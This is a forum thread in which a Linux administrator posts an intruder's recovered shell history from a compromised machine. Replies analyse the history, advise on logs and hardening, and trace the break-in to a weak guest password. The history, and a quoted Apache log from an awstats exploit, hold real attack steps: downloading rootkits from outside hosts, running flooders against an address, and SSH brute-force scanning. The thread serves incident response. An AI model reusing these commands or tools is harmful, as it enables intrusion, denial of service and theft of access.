# Caught somebody rootkiting me today

## fergusoa

 :Embarassed: 

This morning, somebody rootkited a machine I thought was reasonably secure (up-to-date ssh and apache, all other services blocked by shorewall). I discovered the intrusion before they had a chance to delete their .bash_history.

I'll be rebuilding the system (and another one they gained access to), but I'm sorta cuious as to what they were up to, and I'm wondering if their history points to any glaring vaulnerabilities that I should be aware of.

Any insight would be greatly appriciated!

```

w

wget 

cd /tmp

ls -a

uname -a

id

wget ps -x

ps -x

ps -awx

wget www.gas.as.ro/root

rm -rf 404-redirect.html

wget www.grutza.as.ro/root.tar.gz

tar zxvf root.tar.gz

cd root

ls -a

mv root.tar.gz /home

cd 

ls -a

cd /mtp

cd /tmp

mv root.tar.gz /guest

passwd

w

w

cd 

ls -a

wget www.grutza.as.ro/root.tar.gz

tar zxvf root.tar.gz

cd root

./hator

./memo

w

ls -al

./ptrace

w

ls -a

cd

cd root

./pt

./s

cd 

rm -rf root root.tar.gz

cd /tmp

rm -rf root.tar.gz

wget www.grutza.as.ro/vadimII.tgz

tar zxvf vadimII.tgz

./vadimII

./vadimII 208.38.154.110 53

./vadimII 208.38.154.110 53 0

w

ps -x

cd ..

cd /tm,p

cd /tmp

ls -a

rm -rf vadimII vadimII.tgz

wget socks.idilis.ro/flood.tgz

rm -rf blockpage.cgi?ws-session=100716957

wget http://www.funet.fi/pub/crypt/cryptography/pgp-local/old/stealth.tar.gz

tar zxvf stealth.tar.gz

./stealth

cd stealth.c

./stealth.c

make

./stealth

./stealth

ls -al

./stealth 208.38.154.110 53

w

rm -rf stealth.tar.gz stealth.o stealth.manual stealth.c stealth

wget lam3rz.de/psyBNC2.3.1.tar.gz; tar zxvf psyBNC2.3.1.tar.gz; rm -rf psyBNC2.3.1.tar.gz; cd psybnc; make; pico psybnc.conf

vi psybnc.conf

./psybnc

kill -9 6239

vi psybnc.conf

./psybnc

w

netstat -a

ls -a

ps -x

kill -9 6242

w

whois JustBodo.org

w

w

hostaname a

w

w

exit

w

uname -a

cd /tmp

wget www.kriminal.as.ro/bot.tar.gz

tar zxvf bot.tar.gz

cd bot

ls -a

pico mech.set

vi mech.set

vi bbb.usr

./initg

ps -x

kill -9 6408

kill -9 6411 6414

ls -a

cd 

ls -a

cd /tmp

ls -a

rm -rf bot 

rm -rf bot.tar.gz

wget www.grutza.as.ro/mech.tgz

tar zxvf mech.tgz

cd mech

ls -a

pico mech.set

vi mech.set

ls -a

vi ftpusers- 

./mech

ps -x

kill -9 6454 6452

w

ps -x

uname -a

id

w

cd /tmp

ls -al

cd mech

ls -al

less ftpusers- 

less mech.set 

pico ftpusers- 

vi ftpusers- 

vi mech.set 

vi mech.set 

mv mech bash-

./bash- 

./bash- 

./bash- 

passwd

exit

exit

w

ps -awx

w

w

wget 

wget www.grutza.as.ro/stealth

w

w

w

w

w

cd /tmp

l s-a

ftp www.icekid.dap.ro

w

wget wget www.icekid.dap.ro/gas.tar.gz

wget 80.96.205.14/gas.tar.gz

w

w

w

w

exit

a

ls -al

useradd

cd ..

wget www.geocities.com/catalinum/xnet.tar.gz

tar xzvf xnet.tar.gz 

w

uname 0a

uname -a

cd /tmp

ps -x

ls -al

cd .ssh

mkdir .ssh

cd .ssh

wget www.gas.as.ro/root.tar.gz

tar xzvf root.tar.gz 

cd root

./hator 

./memo 

./s

./km3 

ls

./pt

./ptrace 

./e

cd /tmp/.ssh

cd ssh/

mv r00t muie

./muie 212.200 -d 4

cd /tmp

cd .ssh/

cd ssh/

ls -al

./muie 215.125

./muie 215.125 -d 4

./muie 215 -d 4

./muie 212 -d 4

cd /tmp.ssh

cd /tmp..ssh

cd /tmp/.ssh

wget www.geocities.com/dorofteig/em.tar.gz

tar xzvf em.tar.gz 

cdem

cd em

cd emech/

pico emech.users 

vi emech.users 

cat mech.session 

ls

vi mech.session 

./httpd 

./httpd 

exit

cd /tmp

cd .ssh

ls -a

ps -x

kill -9 26396 

kill -9 26398

kill -9 4618

kill -9 4626

cd emech/

ls -a

pico emech.users 

vi emech.users 

./httpd 

./httpd 

./httpd 

cd ..

cd ssh

ls -a

cd ..

wget scanners.go.ro/wow.tgz

wget scanners.go.ro/wow.tgz

./brute

cd ssh/

./brute 

./muie 64.51 -d 4

cd /tmp/ssh

cd /tmp/.ssh

ftp ftp2.megaftpservers.com

ftp ftp2.megaftpservers.com

ls -a

mkdir wow

mv go.sh wow

cd wow

ls -a

cd ..

mv assh wow

mv pscan2  wow

mv ss eoe

mv ss wow

mv assh wow

cd wow

ls

cd ..

mv auto wow

ls -a

mc sshf wow

mv sshf wow

cd wow

ls -a

chmod +_x*

chmod +x *

ls -a

./assh 128.38

./assh 67.121

cd /tmp/.ssh

ls -a

ftp ftp2.megaftpservers.com

w

cd /tmp

cd .ssh

ls -a

rm -rf ssh xnet.tar.gz 

ftp ftp2.megaftpservers.com

cd /tmp

cd " "

ftp ftp2.megaftpservers.com

ls -a

chmod +x 8

chmod +x *

ls -a

wget www.xeofreestyle.com/2000/hybrid.swf

wget www.xeofreestyle.com/2000/hybrid.swf

wget www.xeofreestyle.com/2000/hybrid.swf

ls -a

rm -rf hyb*

ls -a

./assh 212.16

w

id

cat /etc/issue

cd /tmp

ls -a

cd " "

mkdir " "

cd " "

wget

wget lamisto.ws/wow.tgz

ls -a

rm -rf wow.tgz 

rm -rf wow.tar.gz 

wget lamisto.ws/wow.tar.gz

rm -rf wow.tar.gz 

ftp lamisto.ws

ftp ftp.lamisto.ws

ftp ftp2.megaftpservers.com

passwd

cd /tmp

w

who

cd " "

ls -a

./assh 212.16

ls -a

ftp ftp2.megaftpservers.com

cd /tmp

cd " "

ftp ftp.megaftpservers.com

ftp ftp2.megaftpservers.com

ls -a

chmod +x *

./sshf

./assh 212.16

ls -a

./assh 212.17

./assh 216.0

cd /tmp

mkdir " "

cd " "

ls -a

mkdir php

cd php

wget unixshellz.org/sanders/php.tgz

tar xzvf php.tgz 

ftp 212.16.54.197

cd /tmp

ls -a

cd " "

ls -a

cd php

ls -a

ftp sv1.33747.ip.nltree.nl

ftp 63.247.76.5

```

[/code]

----------

## Petyr

The history basically to me appears to be everything they did after they'd already gained root access. Everything that I read in there (err... skimmed really but yea) points to them getting utils to cover their tracks and whatnot.

You're lucky you caught the bastard in the act. At least you know what he was attempting to do, but as for HOW he did it, that's the mystery. Check out your apache log files and all the other log files (please tell me you didn't format the box yet...)

anyhow, hope you figure out how they did it. I'd be interested to know at least. 

hth,

Petyr

----------

## hanj

I think you need to look for stuff in apache's access_log and error_log, also your ftp logs. Guessing that he didn't remove history, there is a good chance the useful entries are in there somewhere. 

Also, anything left in /tmp? 

What's your kernel version? 

What were your SSH settings (/etc/ssh/sshd_config)? 

There has been a rash of SSH brute force attempts.  Did you allow root access from SSH? 

Anything fo

Are all user's passwords 'strong'?

Anything in /var/log/auth.log or /var/log/messages?

You may be able to get a time stamp from running last and then grep on logs. Also, for foresnic purposes... did you install chkrootkit and rkhunter to figure out possible vulnerabilites.. and to see what his root kit(s) have done.

Here is some info on some of the packages he installed.. .

vadimII

FROM: http://www.linuxquestions.org/questions/archive/4/2003/01/2/40902

Finally, about Vadim. From source code of predecessors vadim and vadimI we see vadimII is named after romanian politician called Corneliu Vadim Tudor. If sniffed on the wire a clue for marking payloads in the source: #define Vadim_STRING "0123456789" which does send(s, Vadim_STRING, Vadim_SIZE, 0); later on. Running strings on the binary reveals text "Vadim v.II[beta release] by Luciffer".

Like sl2, sl3 or slice they are DoS flooders. If unpacked from default archives it'll usually be in the vincinity of more flooders, IRC bouncers, (broadcast address) scanners. If hidden with a LKM like Adore dirs and processes will not show up on reboot.

stealth.c

FROM: http://www.packetstormsecurity.org/linux/modules/

Stealth.c is a Linux 2.2.x kernel module which discards packets that many OS detection tools use to query the TCP/IP stack. Includes logging of the dropped query packets and packets with bogus flags.

psyBNC2.3.1.tar.gz

FROM: http://www.voodoohosting.com/files/psyBNC_Install.txt

Before going through these options, do the following: know the IP of your shell. for example, if you connect to 'your.shell.com', go into mirc and type '/dns your.shell.com' to get the numeric IP. Also, choose a port for the bnc. We recommend some random number that no one will guess. Ok, on to the options:

Listening ports - You have to tell the bnc where to listen. You can have it listen on more than one port on the same IP, on multiple IPs with the same port, etc. For most people, listening on just one port on one IP is adequate. (the psybnc default is 31337)

hanji

----------

## zerojay

I would e-mail the servers that the downloaded files were stored on. There's a good chance that they were compromised as well.

----------

## justanothergentoofanatic

Did you find out how they rooted you? I'm curious because I also run Apache in its default configuration.

-Mike

----------

## zerojay

 *justanothergentoofanatic wrote:*   

> Did you find out how they rooted you? I'm curious because I also run Apache in its default configuration.
> 
> -Mike

 

php and phpBB exploits seem to be rather popular these days.

----------

## rshadow

I would be interested in not only how you were rooted.. but how did you detect that you were rooted?

----------

## fleed

One  more request for how they rooted you! I just want to make sure I don't have any vulnerabilities that might lead to the same happening to me.

----------

## codemaker

 *DarkStalker wrote:*   

> 
> 
> php and phpBB exploits seem to be rather popular these days.

 

I heard about phpBB exploits but nothing about php. What exploits are you talking about? Couldn't find any on bugtraq...   :Shocked: 

----------

## rex123

Is it certain that the attacker had root access? Whose .bash_history is that? If it's root, then how come fergusoa can still access after they've changed the password? Also if they got root, why are they putting all their files in a world-writable directory (ie /tmp)? Also, look how lame they are. Look at the bit where they download a program called "stealth", try to cd to a file, try to run some source code, then realise that the program doesn't do what they are trying to do and delete it all.

I don't know, but it's very possible that they didn't get root access, and the attempted exploits all failed (which is what you would hope, running a vaguely up-to-date Gentoo).

The attack looks extremely similar to one I've seen on a server I manage.

We ended up with a script called assh, which uses pscan2 to find machines running ssh, then tries to brute-force them (but not very hard). We also had a version of emech running and connecting to undernet IRC. No real harm was done, and they only had access for a couple of hours.

If you have a feeble password (eg "password", or the same as your username, which was our case) someone will notice, and later use that password to log on. But they don't have root access unless one of their exploits works. In our case they appeared to try to run an exploit that only works for <2.4.10 kernels, so it was no use at all. They also opened a bindshell backdoor that was useless because the port was closed at the firewall.

It's easy to assume the worst, and safest to remove the machine from the network altogether, but I don't think that just because someone has a file called "root" one should assume that the intruder had root access.

----------

## fergusoa

I'm fairly certian they gained access through a weak password --- we imported the passwd/shadow defintions from another host, which contained the username/password pair guest/guest!  I cannot be sure that they obtained root access, but we've rebuilt the systems regardless.  

To answer rshadow's question, the intrusion was spotted in the logs. I noticed that user 'guest' had logged on, and it didn't make any sense.

I've learned my lesson, and I'll be a whole more draconian about userspace/password issues in the future!  I work with a reseach group comprised of engineers with non-cs backgrounds, and we've been slowly learning the do's and don'ts of linux administration --- sometimes the hard way.

Thanks again for all the helpful comments!

----------

## Petyr

Be happy you work with Engineers rather than Scientests!

<grin>

Petyr

who has had the pleasure of working with scientests for almost 4 years running now...

----------

## Mugen096

Just curious, but through all of this, am assuming the the most basic of security steps was taken, that is to not allow the direct login of root through SSH and to also only allow root to be su'd through only a select few individuals?

Dan

----------

## someguy

"There has been a rash of SSH brute force attempts. Did you allow root access from SSH? "

i got rooted and my forum got fubared 

it wasnt ssh but i think they may have sniffed on mine somehow i didnt really notice it till my daemons started failing

i have some of what was left in /tmp it was udp.pl i think the guy was trying to use my machine for a ddos system i give the guy serious respect tho it has been the only time anything of mine has gotten hacked in almost 10 years the guy cleaned after himself there was some entries in /proc 

that i cant figure out how tho im about to check auth.log and i also got his initials in my apache log later on .... still got it heh

----------

## mattman206

I can't help but chuckle at the attacker's lack of Linux skills.

Example:

 *Quote:*   

> 
> 
> wget www.gas.as.ro/root
> 
> rm -rf 404-redirect.html
> ...

 

If you were really all about trying to get root.tar.gz downloaded, you would have just typed it the first time.

 *Quote:*   

> 
> 
> cd /mtp
> 
> cd /tmp 
> ...

 

Guess they can't type either!

 *Quote:*   

> wget www.grutza.as.ro/root.tar.gz 

 

Wait a sec, they already downloaded this once -- why download it again?

 *Quote:*   

> wget socks.idilis.ro/flood.tgz
> 
> rm -rf blockpage.cgi?ws-session=100716957 

 

Whoops, the file isn't there.  Why didn't they check that the file was really there on their local computer before trying to download it on a compromised system and leave tracks?

 *Quote:*   

> tar zxvf stealth.tar.gz
> 
> ./stealth
> 
> cd stealth.c
> ...

 

Hmmm, let's try to run a non-existant program, then change directories to a file, then try to run a C file!  Oh yeah...what was that program you use to compile a file.......mark, muck, oh! make!

 *Quote:*   

> ./stealth
> 
> ./stealth 208.38.154.110 53
> 
> rm -rf stealth.tar.gz stealth.o stealth.manual stealth.c stealth 

 

Hmm, guess it needs more command-line arguments.  Welp, guess it goesn't work, screw it.

 *Quote:*   

> wget lam3rz.de/psyBNC2.3.1.tar.gz; tar zxvf psyBNC2.3.1.tar.gz; rm -rf psyBNC2.3.1.tar.gz; cd psybnc; make; pico psybnc.conf 
> 
> 

 Oh my goodness, I can't believe that they strung multiple commands together with semi-colons!  Now that's getting fancy.  Probably just cutting/pasting from someplace.

 *Quote:*   

> psybnc.conf
> 
> vi psybnc.conf 

 

Yes, let's try to run a configuration file.  Oh wait, I have to edit it.

etc. etc. etc.

I can't imagine this attack was anything other than some script kiddie playing around.  If you google for some of the commands they typed in, especially the longer ones, you can find pages with step-by-step instructions for doing these kinds of things.

One in partitular, containing the psyBNC attempt, has been taken down but is still in the google cache.  Unfortunatley I don't know Spanish.

http://www.google.com/search?q=cache:fLBnxH1ETa4J:www.ircayuda.org/modules.php%3Fname%3DContent%26pa%3Dshowpage%26pid%3D20+lam3rz.de/psyBNC2.3.1.tar.gz%3B+tar+zxvf+psyBNC2.3.1.tar.gz%3B+rm+-rf+psyBNC2.3.1.tar.gz%3B+cd+psybnc%3B+make%3B+pico+psybnc.conf+&hl=en

Try googling for some of the other commands the attacker used -- maybe they'll turn up some more interesting clues.

HTH,

Matt

----------

## alxcm

I do understand Spanish.

On a cursory glance, that page is just instructions for setting up psyBNC and doesn't contain anything referencing hacking/rooting.  It definitely isn't written for a n00b, since (this is a little strange to) it recommends adding a user by editing /etc/passwd and /etc/group.

If you want me to look it over in a little more detail, just ask  :Wink: 

-Alex

----------

## Slynix

Someone got vadimII onto my computer over apache :/

----------

## drspewfy

all this stuff was made from a script kiddie.. he just want HIs bot and your IP to Hide in the IRc..

the psybnc works for ip spoofing.

the emech program.. is just for put a BOt in his irc channel..

he looks that he wotn Hert you.. cuz he just wants the bot, and spoof his ip...

they are really n00bs, and they dont know almost anything about UNIX..

they just know about Rootkits, basic unix command to run his programs.. and that it!.. they are kids around 13-16 yeah old... they just now..   the FAmous ... "./program" 

when i was a child.. i did that kind of stuff.. that was 5 o 6 years ago.. now im 20.

JUST FORMAT YOUR SYSTEM... and more often upgrade your system..

 BUT-..... IM CURIOUS.. CHECK ALL YOUR Logs. how did he ROOTED your box ????

set up SNORT, tripwire, snort_inline; also read step by step the security handbook of gentoo.org/doc .. and apply it on your server... , 

Seeya from mexico

----------

## jonaswidarsson

hello.

I had vadimII today. Nothing feels like a cpu load of 100.0 caused by some cracker. You should try it some time...

Anyways, here is a strange log i grepped out of apache's error_log.

 It seems the hole is in awstats.

```
ns tmp # tail /var/log/apache2/error_log -n 500 | grep 203.162.3.145

[Mon Oct 03 23:09:34 2005] [error] [client 203.162.3.145] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats

[Mon Oct 03 23:09:34 2005] [error] [client 203.162.3.145] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats.pl

[Mon Oct 03 23:09:35 2005] [error] [client 203.162.3.145] File does not exist: /var/www/widarsson/cgi

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] --23:09:38--  http://www.coiuldefier.com/tback8080

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145]            => `tback8080'

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] Resolving www.coiuldefier.com...

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] failed: Host not found.

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] chmod:

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] cannot access `tback8080'

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] : No such file or directory

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145]

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] sh: line 1: ./tback8080: No such file or directory

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] sh: line 1: fg: no job control

[Mon Oct 03 23:09:39 2005] [error] [client 203.162.3.145] File does not exist: /var/www/widarsson/stat-cgi

[Mon Oct 03 23:09:39 2005] [error] [client 203.162.3.145] script not found or unable to stat: /usr/share/webapps/awstats/6.1/hostroot/cgi-bin/perl

[Mon Oct 03 23:09:40 2005] [error] [client 203.162.3.145] File does not exist: /var/www/widarsson/cp

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] --23:09:56--  http://www.ralphy.as.ro/quake

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]            => `quake'

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] Resolving www.ralphy.as.ro...

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] 193.230.153.133

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] Connecting to www.ralphy.as.ro[193.230.153.133]:80...

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] connected.

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] HTTP request sent, awaiting response...

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] 200 OK

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] Length: 18,204 [text/plain]

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]     0K .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] ..

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] ..

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] . .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] ..

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .                                    100%  102.41 KB/s

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] 23:09:56 (102.41 KB/s) - `quake' saved [18204/18204]

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]

[Mon Oct 03 23:09:57 2005] [error] [client 203.162.3.145] sh: line 1: fg: no job control

[Mon Oct 03 23:10:06 2005] [error] [client 203.162.3.145] sh: line 1: fg: no job control

[Mon Oct 03 23:14:57 2005] [error] [client 203.162.3.145] (70007)The timeout specified has expired: ap_content_length_filter: apr_bucket_read() failed

[Mon Oct 03 23:15:06 2005] [error] [client 203.162.3.145] (70007)The timeout specified has expired: ap_content_length_filter: apr_bucket_read() failed

```

And it was probably because of this:

http://www.gentoo.org/security/en/glsa/glsa-200501-36.xml

----------

## Gotterdammerung

Man, that's something that would really take my sweet dreams away.

----------

## Matteo Azzali

 *drspewfy wrote:*   

> 
> 
> JUST FORMAT YOUR SYSTEM... and more often upgrade your system..
> 
>  BUT-..... IM CURIOUS.. CHECK ALL YOUR Logs. how did he ROOTED your box ????
> ...

 

I want some explaination on these irc bots:

Am I secured if irc ports are closed on my firewall?

Is there any other way to get rid of them that's not formatting???

(malware scanner/remover....)

Does an app-centric firewall (checking both the complete executable path and 

the checksum of the executable that generated/want to receive the packets) could protect me better?

----------

